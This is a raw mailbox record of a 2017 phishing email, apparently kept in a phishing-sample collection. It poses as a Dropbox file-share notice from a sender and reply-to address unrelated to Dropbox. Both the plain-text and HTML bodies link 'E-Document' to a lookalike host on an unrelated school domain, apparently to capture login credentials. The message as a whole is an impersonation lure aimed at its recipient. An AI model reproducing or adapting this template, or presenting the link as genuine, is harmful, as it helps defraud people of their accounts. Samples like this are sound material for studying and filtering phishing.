From: "Drop Box" <info@ecoleia.com>
Date: Fri, 02 Jun 2017 11:42:32 -0400
Reply-To: gregoryhulltgren@yahoo.com
X-Virus-Scanned: clamav-milter 0.99.2 at gr0
X-Virus-Status: Clean
Message-Id: <20170602161549.49645C1FE9@smtpin17.b.hostedemail.com>
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 204

You will not see this in a MIME-aware mail reader.
--===============1361149799==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


James used Dropbox to share a file with you  used Dropbox to share a file w=
ith you =

To view the document  Click to open E-Document Here

=A9 2017 DropBox Inc
--===============1361149799==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV id=3Dyui_3_16_0_ym19_1_1496408454994_1790=
0 style=3D"FONT-SIZE: 24px; FONT-FAMILY: Verdana; WHITE-SPACE: normal; WORD=
-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0)=
; FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-I=
NDENT: 0px; -webkit-padding-start: 0px; font-variant-ligatures: normal; fon=
t-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-sty=
le: initial; text-decoration-color: initial" dir=3Dltr data-setdir=3D"false=
"><FONT id=3Dyui_3_16_0_ym19_1_1496408454994_27277 style=3D"-webkit-padding=
-start: 0px" size=3D3><IMG id=3Dyui_3_16_0_ym19_1_1496408454994_17901 style=
=3D"CURSOR: pointer !important; BORDER-TOP: medium none; BORDER-RIGHT: medi=
um none; BORDER-BOTTOM: medium none; BORDER-LEFT: medium none; -webkit-padd=
ing-start: 0px" name=3Dm_-16082076728755406_m_-5279357578726227700_m_208445=
8634614269117_m_-1219515357082689425_m_-6195424555975388660_yui_3_16_0_ym19=
_1_1487567958370_71514 alt=3D"Dropbox Secured logo" src=3D"https://ci6.goog=
leusercontent.com/proxy/nuqbcDB3c9h88BZHyAiZFimOZVdGDDECxfSeNTFA0fGbxFW64KK=
mJZdCjRlAP0Puk5AEzSZRpq4CutB-gphCP5Q-UaGczRibUVX1DBcRBoO0=3Ds0-d-e1-ft#http=
s://qzprod.files.wordpress.com/2013/02/dropbox-logo.png" width=3D158 height=
=3D47 data-id=3D"b83769af-4a73-3583-61ed-305cbe1bd496"><BR id=3Dyui_3_16_0_=
ym19_1_1496408454994_17902 style=3D"-webkit-padding-start: 0px"><FONT id=3D=
yui_3_16_0_ym19_1_1496408454994_17903 style=3D"-webkit-padding-start: 0px" =
color=3D#444444>James used&nbsp;<SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_=
17904 style=3D"-webkit-padding-start: 0px">Dropbox</SPAN>&nbsp;to share a f=
ile with you &nbsp;</FONT></FONT><SPAN style=3D"FONT-SIZE: medium; COLOR: r=
gb(68,68,68); -webkit-padding-start: 0px">used&nbsp;</SPAN><SPAN id=3Dyui_3=
_16_0_ym19_1_1496408454994_17907 style=3D"FONT-SIZE: medium; COLOR: rgb(68,=
68,68); -webkit-padding-start: 0px">Dropbox</SPAN><SPAN style=3D"FONT-SIZE:=
 medium; COLOR: rgb(68,68,68); -webkit-padding-start: 0px">&nbsp;to share a=
 file with you</SPAN></DIV>
<DIV id=3Dyui_3_16_0_ym19_1_1496408454994_17905 style=3D'FONT-SIZE: 24px; F=
ONT-FAMILY: "lucida console", sans-serif; WHITE-SPACE: normal; WORD-SPACING=
: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: normal; COLOR: rgb(0,0,0); FONT-S=
TYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; TEXT-INDENT: 0=
px; -webkit-padding-start: 0px; font-variant-ligatures: normal; font-varian=
t-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: init=
ial; text-decoration-color: initial' dir=3Dltr data-setdir=3D"false"><FONT =
id=3Dyui_3_16_0_ym19_1_1496408454994_27279 style=3D"-webkit-padding-start: =
0px" size=3D3><BR id=3Dyui_3_16_0_ym19_1_1496408454994_17909 style=3D"-webk=
it-padding-start: 0px"><FONT id=3Dyui_3_16_0_ym19_1_1496408454994_17910 sty=
le=3D"-webkit-padding-start: 0px" face=3D"HelveticaNeue, Helvetica Neue, He=
lvetica, Arial, Lucida Grande, sans-serif">To view the document</FONT><FONT=
 id=3Dyui_3_16_0_ym19_1_1496408454994_18478 style=3D"FONT-FAMILY: Verdana; =
-webkit-padding-start: 0px" face=3D"helveticaneue, helvetica neue, helvetic=
a, arial, lucida grande, sans-serif"><SPAN class=3DApple-converted-space>&n=
bsp;</SPAN>&nbsp;</FONT><SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_17911 st=
yle=3D"FONT-FAMILY: Verdana; -webkit-padding-start: 0px">Click to open&nbsp=
;</SPAN><A id=3Dyui_3_16_0_ym19_1_1496408454994_17912 class=3Dedited-link-e=
ditor style=3D"CURSOR: text !important; TEXT-DECORATION: underline !importa=
nt; FONT-FAMILY: Verdana; BACKGROUND: none transparent scroll repeat 0% 0%;=
 COLOR: blue; OUTLINE-WIDTH: medium; PADDING-BOTTOM: 0px; PADDING-TOP: 0px;=
 OUTLINE-STYLE: none; PADDING-LEFT: 0px; MARGIN: 0px; OUTLINE-COLOR: invert=
; PADDING-RIGHT: 0px; -webkit-padding-start: 0px" href=3D"http://dropboxfil=
e.smp1jepon.sch.id/Dropbox/" name=3Dm_-16082076728755406_m_-527935757872622=
7700_m_2084458634614269117_m_-1219515357082689425_m_-6195424555975388660_yu=
i_3_16_0_ym19_1_1487567958370_71523 rel=3Dnofollow target=3D_blank>E-Docume=
nt</A><SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_17913 style=3D"FONT-FAMILY=
: Verdana; -webkit-padding-start: 0px">&nbsp;Here</SPAN><BR id=3Dyui_3_16_0=
_ym19_1_1496408454994_17914 style=3D"-webkit-padding-start: 0px"><BR id=3Dy=
ui_3_16_0_ym19_1_1496408454994_17915 style=3D"-webkit-padding-start: 0px"><=
SPAN id=3Dyui_3_16_0_ym19_1_1496408454994_17916 style=3D"FONT-FAMILY: Verda=
na; -webkit-padding-start: 0px">=A9 2017&nbsp;<SPAN id=3Dyui_3_16_0_ym19_1_=
1496408454994_17917 style=3D"-webkit-padding-start: 0px">DropBox</SPAN>&nbs=
p;Inc</SPAN></FONT></DIV></BODY></HTML>
--===============1361149799==--

From jose@monkey.org Fri Jun  2 16:52:09 2017 +0000
Return-Path: info@ecoleia.com
Delivered-To: jose@monkey.org
X-FDA: 72907699578.01.coil17_2fdd701edd432
X-Spam-Summary: 75,0,0,b77ed96f3e25af5f,d41d8cd98f00b204,info@ecoleia.com,:info@ecoleia.com,RULES_HIT:41:72:379:962:967:973:978:983:988:989:1189:1208:1221:1254:1260:1263:1313:1314:1381:1431:1432:1436:1437:1516:1517:1518:1535:1544:1559:1575:1588:1589:1592:1594:1711:1714:1730:1748:1777:1792:2198:2199:2525:2527:2560:2564:2682:2685:2859:2902:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3040:3138:3139:3140:3141:3142:3148:3865:3867:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4117:4321:5007:6119:6650:6685:6687:8603:8825:8957:9025:9388:10004:10346:11473:11658:11914:12043:12438:12517:12519:12555:12561:12740:12895:12903:12920:12986:13139:13236:13237:13439:14181:14195:14596:14721:14827:21080:21212:21222:21433:21451:21524:21611:21627:30026:30054:30055:30070:30075,0,RBL:178.60.37.12-irl.urbl.hostedemail.com-127.0.0.175,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:65,LUA_SUMMARY:none
X-HE-Tag: coil17_2fdd701edd432
X-Filterd-Recvd-Size: 6160
Received: from gr0.xasta.net (gr0.xasta.net [178.60.37.12])
	by imf04.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  2 Jun 2017 16:52:08 +0000 (UTC)
Received: from DB2.iwg.local (ool-4b7fbe4a.static.optonline.net [75.127.190.74])
	by gr0.xasta.net (Postfix) with ESMTPSA id 42AB91073D5E;
	Fri,  2 Jun 2017 17:47:18 +0200 (CEST)
Content-Type: multipart/alternative; boundary="===============1116639318=="
MIME-Version: 1.0
Subject: You have (1) New Message 
To: Recipients <info@ecoleia.com>
